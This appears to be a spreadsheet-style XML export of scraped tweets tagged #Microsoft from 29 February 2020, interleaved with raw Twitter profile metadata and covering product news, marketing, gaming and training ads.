    <t>{'id': 24777840, 'id_str': '24777840', 'name': 'Gá´‡Ê€á´€Ê€á´… Bá´€Ê€Ê€Ê', 'screen_name': 'gtbarry', 'location': 'California', 'description': 'In alphabetical order: Technology, Marketing, wine, archery, travel and cycling - oh my!\n\nhttps://t.co/Oq3Twk7Ueq', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/Oq3Twk7Ueq', 'expanded_url': 'https://www.linkedin.com/in/gerardbarry/', 'display_url': 'linkedin.com/in/gerardbarry/', 'indices': [90, 113]}]}}, 'protected': False, 'followers_count': 160, 'friends_count': 188, 'listed_count': 18, 'created_at': 'Mon Mar 16 21:51:41 +0000 2009', 'favourites_count': 704, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3143,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'http://pbs.twimg.com/profile_images/1173845298801565696/YOPZDle1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173845298801565696/YOPZDle1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24777840/1535731942', 'profile_link_color': '4F04D9',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</si>
  <si>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Sat Feb 29 18:00:32 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #nonprofit     Turn your nonprofit workforce into a productivity powerhouse with cloud email. "Elevate Your Email" eBook, brought to you by Archon Security, explains how a cloud solution enables more features &amp;amp; functionality. @msftnonprofits https://t.co/emd7e1r7Hl</t>
  </si>
  <si>
    <t>#ML #microsoft #cloud      "Technologies like machine learning -- and the  analytics that can result from its use--are now essential," Forbes reports. Read the article for insights and contact us to discuss how Archon Security can help. https://t.co/nvnNwYjEhv</t>
  </si>
  <si>
    <t>Sat Feb 29 18:00:31 +0000 2020</t>
  </si>
  <si>
    <t>Any Business Central users that love March Madness? We have a special bracket just for you 
https://t.co/zysjflShF4
#Microsoft #MarchMadness #ERP #Basketball #Business #SMB #MSDyn365 #BusinessCentral #Games #Bracket #Bracketology | @Microsoft @MSDYN365BC https://t.co/wkBb4OSqxT</t>
  </si>
  <si>
    <t>#microsoft #cloud  #Azure     Discover how Airbus relies on     Microsoft Azure Stack to fine-tune the design, build &amp;amp; operation of complex products; plus, drive significant change management processes across the organization. https://t.co/r3lrh1i7oS</t>
  </si>
  <si>
    <t>Sat Feb 29 18:00:16 +0000 2020</t>
  </si>
  <si>
    <t>Real life lessons that prepare you for a Career as a Train-The-Trainer - #Certified Trainer  Approved by #Microsoft  The #1 Online Course at #PrepMastersUSA - https://t.co/hHlcnus0xt https://t.co/VcwfeJn04Q</t>
  </si>
  <si>
    <t>Sat Feb 29 18:00:03 +0000 2020</t>
  </si>
  <si>
    <t>New incoming features for #OneDrive for #Android! https://t.co/l49wsXKj5L
#microsoft #office365 #microsoft365 https://t.co/vNtllxescB</t>
  </si>
  <si>
    <t>Sat Feb 29 17:54:39 +0000 2020</t>
  </si>
  <si>
    <t>COMPANY
#Walmart
#Wells Fargo
#Microsoft
#Apple
#Google
#Boeing
#ExxonMobil
#Chevron
#Starbucks
#Verizon for #csr requester Help age india foundation</t>
  </si>
  <si>
    <t>{'id': 1202938493980168192, 'id_str': '1202938493980168192', 'name': 'Motivation Help Age India Foundation', 'screen_name': 'HAIFIndia', 'location': 'India', 'description': 'ngo Help Age india foundation #oldageHome poor #girls #women #Rojgar training #followback #100% India Ranchi #Eyecare vocational 4 #tribal gandhillb14@gmail.com', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2393, 'friends_count': 4456, 'listed_count': 0, 'created_at': 'Fri Dec 06 13:11:13 +0000 2019', 'favourites_count': 11865, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8537, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1233616914737438721/dfijqHPV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233616914737438721/dfijqHPV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1202938493980168192/1582934751',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</si>
  <si>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17:52:34 +0000 2020</t>
  </si>
  <si>
    <t>Preview a fully parsed YAML document without running the pipelinehttps://zcu.io/gXkM 
#Microsoft #azure #documents #cloud #devops #clouds #technology #ai #issquared #cybersecurity https://t.co/Nv6cloCKQt</t>
  </si>
  <si>
    <t>Sat Feb 29 17:50:45 +0000 2020</t>
  </si>
  <si>
    <t>1 new repository created in Microsoft
- 1 dtmi
 #GitHub #OpenSource #microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 17:48:34 +0000 2020</t>
  </si>
  <si>
    <t>Not sure what the difference is between Active Directory and Azure Active Directory.
Learn all about it over here.
#Microsoft #ActiveDirectory #AD #Azure #AzureAD #AAD #identity #CloudIdentity  https://t.co/ladGgaOXz3</t>
  </si>
  <si>
    <t>Sat Feb 29 17:48:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Partners with Quebecs Terranova Security to deliver cybersecurity training https://t.co/VMMFMG7qUe #microsoft</t>
  </si>
  <si>
    <t>{'id': 14545142, 'id_str': '14545142', 'name': 'Anto Budiardjo', 'screen_name': 'AntoBud', 'location': 'San Francisco Bay Area', 'description': 'Creative technologist and marketeer seeking to change the world', 'url': 'http://t.co/UvFSt7dWeg', 'entities': {'url': {'urls': [{'url': 'http://t.co/UvFSt7dWeg', 'expanded_url': 'http://about.me/antobud', 'display_url': 'about.me/antobud', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 598, 'friends_count': 617, 'listed_count': 30, 'created_at': 'Sat Apr 26 14:15:52 +0000 2008', 'favourites_count': 191, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2091,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'http://pbs.twimg.com/profile_images/53353840/Anto-Head_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/53353840/Anto-Head_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14545142/1398231964',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</si>
  <si>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17:43:39 +0000 2020</t>
  </si>
  <si>
    <t>A secure foundation for IoT, Azure Sphere now generally availablehttps://zcu.io/7fa9 
#Microsoft #iot #azure #foundation #community #tehnology #sphere #virtualization #Issquared #cloud https://t.co/EgT4y7GpcF</t>
  </si>
  <si>
    <t>Sat Feb 29 17:41:20 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month Celebration: Design and Code Apps | PRIVATE
My Multimedia Ministry students learning app building
#microsoft
#empoweringyouth
#entrepreneurs  #wegrowyouth https://t.co/Mq7ulKk8Dp</t>
  </si>
  <si>
    <t>{'id': 1219661674552201218, 'id_str': '1219661674552201218', 'name': 'Global Solutions Enterprise', 'screen_name': 'GlobalS20790885', 'location': '', 'description': 'Defined by Integrity,Service, and Expertise', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 4, 'listed_count': 0, 'created_at': 'Tue Jan 21 16:43:13 +0000 2020', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True,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'http://pbs.twimg.com/profile_images/1219661910641123328/wytQknQA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219661910641123328/wytQknQA_normal.jpg',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</si>
  <si>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17:40:21 +0000 2020</t>
  </si>
  <si>
    <t>#HaloInfinite will mostly likely be available for #XboxGamePassUltimate as well. Can't wait for #XboxSeriesX!!!
Its nice to see #Microsoft on offense this time around. https://t.co/ikyPTfYagv</t>
  </si>
  <si>
    <t>{'id': 1045495725348573184, 'id_str': '1045495725348573184', 'name': 'DaBuffNerd_Gamer', 'screen_name': 'DabuffnerdG', 'location': 'Missouri, USA', 'description': 'Recreational Buff gamer and Youtuber.\n\nCome vist my channel:\nhttps://t.co/OnWSfdgHKu\n\nLevel UpðŸŽ®,Speak in Comic SansðŸ—¯, HoistðŸ‹', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/OnWSfdgHKu', 'expanded_url': 'https://www.youtube.com/channel/UCfWTYwVX9F-DHWAm9SpiBHw', 'display_url': 'youtube.com/channel/UCfWTYâ€¦', 'indices': [61, 84]}]}}, 'protected': False, 'followers_count': 15, 'friends_count': 89, 'listed_count': 0, 'created_at': 'Fri Sep 28 02:09:40 +0000 2018', 'favourites_count': 197, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 290, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1205300547370340353/eI9PQCYP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205300547370340353/eI9PQCYP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1045495725348573184/1575671188',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</si>
  <si>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17:39:11 +0000 2020</t>
  </si>
  <si>
    <t>Upcoming event "Power BI Workshop - Sri Lanka" 
Contact us at +94 (071) 6092918 
                         training@bluechiptraining.biz   #PowerBI #Microsoft #MVP #BluechipT #Singapore #SriLanka #Colombo #Philippines #HongKong #India #UK #USA #France https://t.co/desX793jAv</t>
  </si>
  <si>
    <t>{'id': 1042446493364346880, 'id_str': '1042446493364346880', 'name': 'Bluechip Training', 'screen_name': 'BluechipT', 'location': 'Colombo', 'description': 'Skills for the next step in your career\n#AI #machinelearning #DeepLearning #BlockChain #azure #Xamarin #androidapps #iOS #MicrosoftAI #MVP #BluechipT #Singapore', 'url': 'https://t.co/Rmcm52N3YW', 'entities': {'url': {'urls': [{'url': 'https://t.co/Rmcm52N3YW', 'expanded_url': 'http://www.bluechiptraining.biz', 'display_url': 'bluechiptraining.biz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 132, 'friends_count': 558, 'listed_count': 3, 'created_at': 'Wed Sep 19 16:13:06 +0000 2018', 'favourites_count': 1413, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 401, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1042448830271311875/kbYt7gYL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1042448830271311875/kbYt7gYL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1042446493364346880/1537374150',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</si>
  <si>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17:37:46 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Announces Date of Sweeping Retirement of MCSA, MCSE, MCSD Certifications. Read How it Impacts You. https://t.co/dWHxfVXO6z #microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 17:37:45 +0000 2020</t>
  </si>
  <si>
    <t>Amazing news and #Microsoft is leading the path for #Autismatwork ! #careersintech #careergrowth #msftadvocate  #microsoftlife https://t.co/z6DHVrNOBx</t>
  </si>
  <si>
    <t>Sat Feb 29 17:37:21 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft to Improve #Cortana for #Windows with Next Spring Update, Focusses More on Productivity https://t.co/FmAUqQoyqg https://t.co/jG4cxG6YCb</t>
  </si>
  <si>
    <t>Sat Feb 29 17:36:50 +0000 2020</t>
  </si>
  <si>
    <t>Burst 4K encoding on Azure Kubernetes Servicehttps://zcu.io/XfVT 
#Azure #kubernetes #Microsoft #cloud #clouds #cybersecurity #technology #automation #issquared #platform https://t.co/xJ5Q7yF9Pk</t>
  </si>
  <si>
    <t>Sat Feb 29 17:36:35 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has again confirmed #Windows Core OS plans.
https://t.co/g2ImKJVKZH</t>
  </si>
  <si>
    <t>Sat Feb 29 17:36:04 +0000 2020</t>
  </si>
  <si>
    <t>Join our NICE and Microsoft compliance rock-stars for a forum dedicated to Cloud and Teams. Its your last chance to register  click here and find out more &amp;gt;&amp;gt; 
https://t.co/dD3Jssv5KH
#NICECompliance #NetworkwithNICE #MicrosoftTeams #Microsoft #CX #Finance #Compliance https://t.co/2PYBxvgTZE</t>
  </si>
  <si>
    <t>Sat Feb 29 17:34:56 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft     When faceless foes rear their ugly heads, #TheUnsung will be there to defend our valuable data, armed with the most advanced cybercrime-fighting tools from #Microsoft365. https://t.co/e0LCF6WneP https://t.co/tYu7yqsBlm</t>
  </si>
  <si>
    <t>Sat Feb 29 17:34:28 +0000 2020</t>
  </si>
  <si>
    <t>Why users are not adopting #Microsoft | #Office365  Tracy van der Schyff https://t.co/asyodIxUpn</t>
  </si>
  <si>
    <t>{'id': 865626625, 'id_str': '865626625', 'name': 'Ahmad Saab MD MPH', 'screen_name': 'asaabmd', 'location': 'Las Vegas, NV', 'description': 'Family #Medicine BC USC CHC #Physician.Tweeting on #Telemedicine #Telehealth #Clinical #Health #Informatics #EHR #EMR #Healthcare #Meaningfull Use #PCMH #Dragon', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 267, 'friends_count': 383, 'listed_count': 41, 'created_at': 'Sun Oct 07 02:10:36 +0000 2012', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2169,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'http://pbs.twimg.com/profile_images/1104528369540984832/dsFF-wf4_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1104528369540984832/dsFF-wf4_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/865626625/1425883390',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</si>
  <si>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17:34:25 +0000 2020</t>
  </si>
  <si>
    <t>how to create table, enter numbers and text, and apply formatting in #microsoft #excel 2016 #Office365 #techsupport #100DaysOfCode 
https://t.co/nnoiWgOUWD https://t.co/OXCzstmUrY</t>
  </si>
  <si>
    <t>Sat Feb 29 17:34:15 +0000 2020</t>
  </si>
  <si>
    <t>Google says Microsoft Edge isn't secure. I asked Google why | ZDNet https://t.co/6JWW7UqehE What!!! No way! I was a fan of Google Chrome but #Edge vs #GoogleChrome on Windows 10 put Microsoft's browser on the first position! Chromium based #Microsoft #browser is faster!!!</t>
  </si>
  <si>
    <t>{'id': 71482578, 'id_str': '71482578', 'name': 'constantin andronic', 'screen_name': 'tunelos', 'location': 'Vaslui Romania', 'description': '', 'url': 'https://t.co/gdIA7QvzZ4', 'entities': {'url': {'urls': [{'url': 'https://t.co/gdIA7QvzZ4', 'expanded_url': 'https://www.linkedin.com/in/constantin-andronic-4b3a1b16/', 'display_url': 'linkedin.com/in/constantin-â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 131, 'friends_count': 567, 'listed_count': 14, 'created_at': 'Fri Sep 04 07:44:06 +0000 2009', 'favourites_count': 2046, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4837,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'http://pbs.twimg.com/profile_images/1219123427195310080/vA2gIHMM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219123427195310080/vA2gIHMM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/71482578/1561574393', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': 'A32769', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 17:34:05 +0000 2020</t>
  </si>
  <si>
    <t>Big thanks to #RSAC2020, #synack, #microsoft, #signalsciences, and #wicys for providing the amazing swag for our #cybertechgirls today! https://t.co/CH73wXW7CY</t>
  </si>
  <si>
    <t>Sat Feb 29 17:34:04 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 17:33:48 +0000 2020</t>
  </si>
  <si>
    <t>@RockstarGames I think I got most of it lol #RockstarGames #rockstar @IGN  #gamer #gaming #ps5 #xbox #sony #microsoft https://t.co/ADO9IdeuvK</t>
  </si>
  <si>
    <t>{'id': 3287934815, 'id_str': '3287934815', 'name': 'JFontPhoton', 'screen_name': 'JFontPhoton', 'location': '', 'description': 'Philly/South Jersey Photographer// Letâ€™s collaborate //', 'url': 'https://t.co/lpjsmb97CI', 'entities': {'url': {'urls': [{'url': 'https://t.co/lpjsmb97CI', 'expanded_url': 'http://www.JFontPhoton.com', 'display_url': 'JFontPhoton.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 63, 'friends_count': 294, 'listed_count': 1, 'created_at': 'Mon May 18 05:00:15 +0000 2015', 'favourites_count': 600, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 314,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'http://pbs.twimg.com/profile_images/628796512068325376/Cra7HqWv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/628796512068325376/Cra7HqWv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3287934815/1431926646',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</si>
  <si>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17:26:01 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft @MicrosoftXboxOn loving this new design in the homepage. ! #goodDesign #xboxone #microsoft</t>
  </si>
  <si>
    <t>{'id': 14251572, 'id_str': '14251572', 'name': 'Leigh Nelson', 'screen_name': 'socks88', 'location': 'Toronto,ON Canada', 'description': 'Digital artwork using landscape and architectural inspiration to reflect views.-Work in the Making-New Heights and Mood C.A.G.E', 'url': 'https://t.co/wJMIeLWnMa', 'entities': {'url': {'urls': [{'url': 'https://t.co/wJMIeLWnMa', 'expanded_url': 'https://www.leighnelsonart.com/', 'display_url': 'leighnelsonart.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 747, 'friends_count': 127, 'listed_count': 105, 'created_at': 'Sat Mar 29 15:39:37 +0000 2008', 'favourites_count': 495, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13109,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'http://pbs.twimg.com/profile_images/1173277587323478016/nerGbY8i_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173277587323478016/nerGbY8i_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14251572/1566566592',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</si>
  <si>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Sat Feb 29 17:23:44 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft to return to the mobile market with Surface Duo #microsoft #surfaceduo https://t.co/XoywpcfEOL https://t.co/CcoPYed8U7</t>
  </si>
  <si>
    <t>Sat Feb 29 17:19:55 +0000 2020</t>
  </si>
  <si>
    <t>@MSNewEngland @Microsoft 
Are you aware that you donated 10 computers to a Non profit that doesnt exist on paper
Are you also aware that you 
donated 10 computers to an ANTI LAW ENFORCEMENT (one woman run) operation
 #LooseCannon
 #StopMonicaCannonGrant
#Microsoft https://t.co/3zEYh1w9TM</t>
  </si>
  <si>
    <t>{'id': 1227768002348711936, 'id_str': '1227768002348711936', 'name': 'Stop Monica &amp; Mayor Walshâ€™s Anti Police Plans', 'screen_name': 'WalshPlans', 'location': 'Boston, MA', 'description': 'Raising Concerns surrounding Mayor Walshâ€™s relationship with Anti Police Organization â€œViolence In Bostonâ€ and the â€œSocial Impact Centerâ€ theyâ€™re launching', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 44, 'friends_count': 643, 'listed_count': 0, 'created_at': 'Thu Feb 13 01:34:52 +0000 2020', 'favourites_count': 84, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 186, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227769904474001410/P0FzIauu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227769904474001410/P0FzIauu_normal.jpg',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</si>
  <si>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17:12:11 +0000 2020</t>
  </si>
  <si>
    <t>While the sheer number of attack surfaces available on any system is truly massive, Windows 10 has been taking yet another beating.
Contact us @GrabTheAxe now to schedule a consultation.
#CyberSecurity #Microsoft #GrabTheAxe #Windows #SecurityInHand
https://t.co/rMlp1lqqEK</t>
  </si>
  <si>
    <t>{'id': 896068663765196801, 'id_str': '896068663765196801', 'name': 'Jeffrey Welch', 'screen_name': 'JeffreyAWelch', 'location': 'Phoenix, AZ', 'description': 'Entrepreneur and Security Consultant with an amazing wife and son.', 'url': 'https://t.co/iPumzSDQx2', 'entities': {'url': {'urls': [{'url': 'https://t.co/iPumzSDQx2', 'expanded_url': 'https://www.linkedin.com/in/jxwelch', 'display_url': 'linkedin.com/in/jxwelch', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 323, 'friends_count': 699, 'listed_count': 2, 'created_at': 'Fri Aug 11 17:59:52 +0000 2017', 'favourites_count': 441, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 575, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1161301146817875968/cYYOTa5w_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161301146817875968/cYYOTa5w_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/896068663765196801/1502943580',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</si>
  <si>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17:12:00 +0000 2020</t>
  </si>
  <si>
    <t>While the sheer number of attack surfaces available on any system is truly massive, Windows 10 has been taking yet another beating.
Contact us @GrabTheAxe now to schedule a consultation.
#CyberSecurity #Microsoft #GrabTheAxe #Windows #SecurityInHand
https://t.co/c2QHy1MNO3</t>
  </si>
  <si>
    <t>{'id': 1176368049554747393, 'id_str': '1176368049554747393', 'name': 'Grab The Axe', 'screen_name': 'GrabTheAxe', 'location': '', 'description': 'At Grab The Axe Consulting we focus on a fully integrated approach to your security needs. Our team sports over 130 years of combined experience in security.', 'url': 'https://t.co/02JfoItFRX', 'entities': {'url': {'urls': [{'url': 'https://t.co/02JfoItFRX', 'expanded_url': 'http://grabtheaxe.com', 'display_url': 'grabtheaxe.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 80, 'listed_count': 0, 'created_at': 'Tue Sep 24 05:30:01 +0000 2019', 'favourites_count': 56, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 291, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1176368210179805184/cWsKbWnr_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176368210179805184/cWsKbWnr_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1176368049554747393/1577677301',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</si>
  <si>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17:09:01 +0000 2020</t>
  </si>
  <si>
    <t>Update #Microsoft #Windows Systems to Patch 99 New #Security Flaws - https://t.co/G3egaS14wK #IT #ITsecurity #vulnerabilities https://t.co/L23Zxg2vnQ</t>
  </si>
  <si>
    <t>{'id': 1727360394, 'id_str': '1727360394', 'name': 'Vallum Software', 'screen_name': 'vallumsoftware', 'location': 'Georgia, USA', 'description': 'Next Gen  #EdgeComputing #IoT #ITmonitoring #NetworkMonitoring  #NetworkManagement #msp #software #microservices #containers #surveillancecameras #IIoT', 'url': 'https://t.co/c4SuztFzfq', 'entities': {'url': {'urls': [{'url': 'https://t.co/c4SuztFzfq', 'expanded_url': 'http://www.vallumsoftware.com', 'display_url': 'vallumsoftware.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 371, 'friends_count': 176, 'listed_count': 767, 'created_at': 'Wed Sep 04 03:04:53 +0000 2013', 'favourites_count': 1793, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12293,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'http://pbs.twimg.com/profile_images/692060391220752384/sO2C0111_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/692060391220752384/sO2C0111_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1727360394/1461775360',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</si>
  <si>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17:06:07 +0000 2020</t>
  </si>
  <si>
    <t>Here is the first article from a series of four about #RabbitMQ with #docker in #dotnet.
https://t.co/TAC06NKJJW
#rabbitmq #producer #Docker #amqp #Microsoft #dotnet #hexo https://t.co/TDzoYjBaAT</t>
  </si>
  <si>
    <t>{'id': 1231489693130334210, 'id_str': '1231489693130334210', 'name': 'Eduard Stefanescu', 'screen_name': 'EdStefanescu', 'location': 'Romania', 'description': 'A full-stack enthusiast, #backend web-applications #devops rdbms dbms - Engineer', 'url': 'https://t.co/KTQUZ6TV03', 'entities': {'url': {'urls': [{'url': 'https://t.co/KTQUZ6TV03', 'expanded_url': 'https://stefanescueduard.github.io/', 'display_url': 'stefanescueduard.github.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 69, 'listed_count': 0, 'created_at': 'Sun Feb 23 08:03:48 +0000 2020', 'favourites_count': 59, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 19, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235267068121010176/ekp-AYQk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235267068121010176/ekp-AYQk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1231489693130334210/1582447336',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</si>
  <si>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17:05:08 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Guidance for Enabling LDAP Channel Binding and LDAP Signing https://t.co/gRUNVNrnqr #Microsoft #Security #Windows Born's Tech and Windows World</t>
  </si>
  <si>
    <t>{'id': 117342573, 'id_str': '117342573', 'name': 'GÃ¼nter Born', 'screen_name': 'etguenni', 'location': '', 'description': 'IT-Autor, Blogger, Microsoft MVP\nWeitere Sites:\nBorns IT- und Windows-Blog\nhttp://t.co/ReheUkWsBW', 'url': 'http://t.co/G29Ocv5npM', 'entities': {'url': {'urls': [{'url': 'http://t.co/G29Ocv5npM', 'expanded_url': 'http://www.borncity.com', 'display_url': 'borncity.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/ReheUkWsBW', 'expanded_url': 'http://www.borncity.com/blog/', 'display_url': 'borncity.com/blog/', 'indices': [75, 97]}]}}, 'protected': False, 'followers_count': 718, 'friends_count': 296, 'listed_count': 53, 'created_at': 'Thu Feb 25 08:10:33 +0000 2010', 'favourites_count': 2332, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 24853,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'http://pbs.twimg.com/profile_images/1814863310/GBorn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1814863310/GBorn_normal.jpg',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</si>
  <si>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17:05:03 +0000 2020</t>
  </si>
  <si>
    <t>We're rearchitecting everything at Microsoft now that we're fully in the #cloud. #transformation #Azure #Microsoft https://t.co/4yTBEmc8UM #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sat Feb 29 17:01:05 +0000 2020</t>
  </si>
  <si>
    <t>Sign up for next weeks webinar for tips and tricks when protecting Office 365 data with the industrys best Office 365 backup solution! #Webinar #Data #Office365 #Microsoft #Productivity #Datarecovery
Sign up here  https://t.co/H8k5T6SOqF https://t.co/5AdQz6g5QP</t>
  </si>
  <si>
    <t>Sat Feb 29 17:00:14 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/XcW0MiT6kg</t>
  </si>
  <si>
    <t>Sat Feb 29 16:59:32 +0000 2020</t>
  </si>
  <si>
    <t>#Apple #Microsoft #Laptops 8 of the best laptop brands for 2020 https://t.co/ylvB3ZSF4Q https://t.co/zG5yhj8HpA</t>
  </si>
  <si>
    <t>Sat Feb 29 16:59:06 +0000 2020</t>
  </si>
  <si>
    <t>#Apple #Microsoft 8 of the best laptop brands for 2020 https://t.co/W6m9J0r8F2 | https://t.co/9AaTTqXITl https://t.co/8iyT0aLeYh</t>
  </si>
  <si>
